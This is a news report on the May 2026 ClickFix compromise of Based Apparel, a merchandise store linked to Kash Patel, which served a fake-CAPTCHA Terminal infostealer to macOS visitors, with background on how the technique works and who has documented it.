May 23, 2026 — Based Apparel, a merchandise store linked to FBI Director Kash Patel, was compromised and served a ClickFix infostealer to macOS visitors for an unknown period before the site went dark on Friday. The attack targeted crypto wallets, browser session tokens, and login credentials — the standard payload of a class of macOS campaigns that security researchers have flagged as a primary initial access vector throughout 2026.

The incident was first flagged on X on May 22 by a user who visited basedapparel.com after an Atlantic article linked to the site. That report was subsequently reproduced and confirmed by PCMag, which verified the malicious prompt was live. Decrypt and SC Media subsequently reported the site offline by Friday morning, showing a message that the store would return "bolder than ever."

What visitors saw

macOS visitors were met with a fake Cloudflare CAPTCHA screen — a standard lure in the ClickFix playbook. The page instructed users to complete a "human verification" step by copying a command and pasting it into their Mac's Terminal application. The command was an obfuscated payload designed to execute silently and harvest data already on the machine: crypto wallet files, browser session tokens, and stored credentials.

The MetaMask browser wallet flagged basedapparel.com as "potentially deceptive," surfacing a warning about "malicious transactions resulting in stolen assets" for any MetaMask user who navigated to the site, per Decrypt.

The number of visitors exposed is not publicly known. Web analytics provider ahrefs estimated the site receives approximately 33,600 visits per month, per Decrypt — though that figure covers normal traffic and says nothing about how long the malicious version was live before it was reported.

How ClickFix works

ClickFix is a social engineering technique, not a software exploit. It requires no browser vulnerability or zero-day. The attacker compromises a legitimate website and injects a page that mimics a trusted checkpoint — most commonly a Cloudflare CAPTCHA or a system error dialog. The page tells the visitor something needs to be "fixed" to proceed, and provides a command to copy.

On macOS, the target is Terminal. The user pastes and runs the command themselves. Because the command executes with the user's own privileges, macOS's Gatekeeper — its primary defense against unsigned software — does not trigger. The payload lands as if the user installed it intentionally.

Recorded Future's Insikt Group has documented five distinct ClickFix infrastructure clusters actively operating in 2025 and 2026, covering both Windows (via the Run dialog) and macOS (via Terminal). Their assessment: ClickFix "will very likely remain a primary initial access vector throughout 2026." A Microsoft Security blog post from May 6, 2026 documented a parallel ClickFix campaign using fake macOS utility lures to deliver infostealers — confirming the technique is in active, broad deployment.

Security researchers have also documented variants that bypass Terminal entirely: Jamf Threat Labs reported a ClickFix variant that uses macOS's Script Editor instead, triggered through the applescript:// URL scheme. The Based Apparel compromise used the Terminal variant — the earlier and more prevalent form.

Attribution and context

Based Apparel is owned by Kash Patel and Andrew Ollis, who also serves as CEO of the Kash Foundation, per The Guardian. The Kash Foundation — a nonprofit Patel founded — linked to the apparel site through one of its primary navigation menus. The foundation's site states Patel is no longer affiliated with the organization in any capacity and that the foundation has no government affiliation.

The attack is a third-party compromise. Nothing in the reported evidence indicates the site was set up to serve malware intentionally; it is consistent with the standard profile of a ClickFix campaign: actors scan for vulnerable e-commerce sites, inject the fake CAPTCHA page, and let traffic do the rest.

This is not Patel's first proximity to crypto-adjacent security incidents. After Iranian hackers leaked his personal email and a burner username, a wave of Patel-themed meme coins followed on Pump.fun, per Decrypt.

What this illustrates

The Based Apparel case is structurally unremarkable as a ClickFix incident — a legitimate site compromised, a fake CAPTCHA injected, macOS users prompted into running a hostile Terminal command. What makes it visible is the principal: the director of the FBI, an agency that in March 2026 was investigating ClickFix-style malware deployed through Steam games, had his merchandise site running the same category of attack.

The deeper pattern is supply-chain exposure at the traffic level. Users arrived at basedapparel.com through a credible referral — a link in an Atlantic article. The site had legitimate historical traffic. Neither indicator triggered suspicion. ClickFix works precisely because it does not rely on software exploitation; it relies on the user's trust in the page they are already on.

Crypto wallet users have a specific exposure here. ClickFix infostealers routinely target wallet seed phrases stored in browser extensions and application files, session tokens that can allow account takeover without a password, and any credentials cached by the browser. MetaMask's flagging of the domain as potentially deceptive was functional protection for users who had the extension installed — but only for MetaMask. Other wallet software and browser-stored credentials had no equivalent warning.

The site was offline as of Friday morning, May 23, 2026.

Sources: PCMag · Decrypt · SC Media · Recorded Future / Insikt Group · Microsoft Security Blog · Jamf Threat Labs · Original X report by @dm4uz3 · The Guardian